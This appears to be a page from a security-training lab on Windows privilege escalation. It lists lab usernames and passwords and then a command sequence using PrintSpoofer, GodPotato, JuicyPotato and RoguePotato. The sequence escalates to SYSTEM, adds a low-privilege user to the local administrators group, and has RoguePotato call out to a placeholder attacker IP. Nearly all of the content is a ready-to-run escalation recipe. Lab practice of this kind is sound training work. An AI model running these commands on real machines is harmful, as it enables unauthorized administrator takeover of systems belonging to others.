⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo | alice / alice123 | administrator / Admin@2024 (goal: escalate to this)
Token Impersonation — PrintSpoofer & Potato Attacks
PRIVILEGE ESCALATION
whoami /priv
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net localgroup administrators ram /add"
JuicyPotato.exe -l 1337 -p cmd.exe -t * -c "{CLSID}"
RoguePotato.exe -r YOUR_IP -e "cmd.exe" -l 9999
whoami